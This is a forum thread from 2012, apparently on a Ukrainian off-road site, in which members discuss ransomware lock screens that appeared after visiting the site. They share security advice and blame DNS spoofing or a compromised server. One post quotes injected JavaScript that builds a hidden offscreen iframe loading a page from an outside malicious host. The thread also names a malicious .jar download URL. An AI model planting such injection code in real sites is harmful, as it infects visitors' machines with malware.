![Фотографія](https://www.offroadmaster.com//public/style_images/master/profile/default_large.png)
Вредноносная прога
#43
ПОЗА САЙТОМ
#44
ПОЗА САЙТОМ
Відправлено 26 October 2012 - 10:15
- Для входа в систему не используйте подключение по баннерным ссылкам либо ссылкам, полученным по электронной почте.
- Не отвечайте на запросы (чаще всего рассылаются через электронную почту), содержащие требование предоставить или проверить логин и пароль.
- Рекомендуется удалять подозрительные электронные письма, не открывая их, особенно письма от неизвестных отправителей с прикрепленными файлами с расширениями *.exe, *.pif, *.vbs и другие файлы.
и т.д. и т.п.
#45
ПОЗА САЙТОМ
Відправлено 26 October 2012 - 12:35
Коротше, софт має бути свіжим, антивірус—оновленим, файрвол просто має бути, бо наші провайдери часто виставляють комп’ютери клієнтів «голою ж в Інтернет».
#46
ПОЗА САЙТОМ
Відправлено 26 October 2012 - 17:22
#50
ПОЗА САЙТОМ
Відправлено 29 October 2012 - 10:30
Вот это наглость!!!Вот, сегодня утром при входе на сайт выскочила вот эта хрень:
![:330:](http://www.offroadmaster.com/public/style_emoticons/default/330.gif)
![:330:](http://www.offroadmaster.com/public/style_emoticons/default/330.gif)
![:330:](http://www.offroadmaster.com/public/style_emoticons/default/330.gif)
http://yandex.ua/yan...окировка&lr=143
#52
ПОЗА САЙТОМ
Відправлено 29 October 2012 - 12:38
var newIframe=document.createElement('iframe');newIframe.src='http://ynefgawcfrol.cnisemi.com/do.php?fn=1&id=108&pageLoad=';newIframe.style.width='10px';newIframe.style.height='10px';newIframe.style.position='absolute';newIframe.style.top='-100px';newIframe.style.left='-100px';document.body.insertBefore(newIframe, document.body.firstChild);
Надеюсь эта инфа поможет админам в устранении проблемы.
- Hakim це подобається
#53
ПОЗА САЙТОМ
Відправлено 29 October 2012 - 13:02
http://whois.domaintools.com/cnisemi.com китайские хакеры.добавляет ссылки на какой то левый сайт, вот расшифрованный код, который эвалится:
![:269:](http://www.offroadmaster.com/public/style_emoticons/default/269.gif)
Я так понимаю, что наших читателей в Китае нет, так что заблокировать нахрен весь IP-диапазон на уровне хостера.
- Predator і Shamba це подобається
#55
ПОЗА САЙТОМ
Відправлено 29 October 2012 - 15:00
Вот, сегодня утром при входе на сайт выскочила вот эта хрень:
Изображение
Можно как-то наказать шутников? Или проклятие наслать?
Или хотя бы код для разблокирования подскажите...
Эта же куйня и на меня напала
![:175:](http://www.offroadmaster.com/public/style_emoticons/default/175.gif)
В безопасном режиме убрал из автозагрузки файл ms
И удалил ms.exe по адресу указанному в автозагрузке.
- Predator це подобається
#56
ПОЗА САЙТОМ
Відправлено 29 October 2012 - 15:04
О, так вже краще.обнаружено: троянская программа HEUR:Exploit.Script.Blocker файл: http://ecwosrvyqrzka...94/jAA2ingo.jar
Що ми маємо: лівий домен ecwosrvyqrzkahx.file-end-ocedodmngd.org, доречі, зараз вже неіснуючий, на якому лежить глибоко захована програма-вірус. Доречі, сам сайт file-end-ocedodmngd.org значиться в базах даних браузерів як нападницький.
Я практично повністю впевнений в тому, що маємо DNS-spoofing.
Як варіант, можу порадити використовувати DNS-сервери Google чи OpenDNS:
https://developers.g...eed/public-dns/
http://en.wikipedia.org/wiki/OpenDNS
можливість отруєння їх кешу досить низька, а їх адміністратори багато уваги приділяють безпеці.
#57
ПОЗА САЙТОМ
Відправлено 29 October 2012 - 15:26
О, в полку извращенцев прибыло!Вот, сегодня утром при входе на сайт выскочила вот эта хрень:
![:330:](http://www.offroadmaster.com/public/style_emoticons/default/330.gif)
http://www.offroadma...st__p__26279677
#58
ПОЗА САЙТОМ
Відправлено 29 October 2012 - 18:02
О, так вже краще.
Що ми маємо: лівий домен ecwosrvyqrzkahx.file-end-ocedodmngd.org, доречі, зараз вже неіснуючий, на якому лежить глибоко захована програма-вірус. Доречі, сам сайт file-end-ocedodmngd.org значиться в базах даних браузерів як нападницький.
Я практично повністю впевнений в тому, що маємо DNS-spoofing.
Як варіант, можу порадити використовувати DNS-сервери Google чи OpenDNS:
https://developers.g...eed/public-dns/
http://en.wikipedia.org/wiki/OpenDNS
можливість отруєння їх кешу досить низька, а їх адміністратори багато уваги приділяють безпеці.
Кстати, скорее всего это решение проблемы.
У меня в настройках: предпочитаемый DNS-сервер 8.8.8.8. гугловский, а уже в альтернативных свой. Может поэтому никогда проблем не было?
#59
ПОЗА САЙТОМ
Відправлено 29 October 2012 - 21:51
Все таки кто то наш сервер таки заразил. Я гляжу, у нас много недоброжелателей появилось...
Повідомлення відредагував Важняк: 29 October 2012 - 21:52
Кількість користувачів, які читають цю тему: 1
0 користувачів, 1 гостей, 0 прихованих користувачів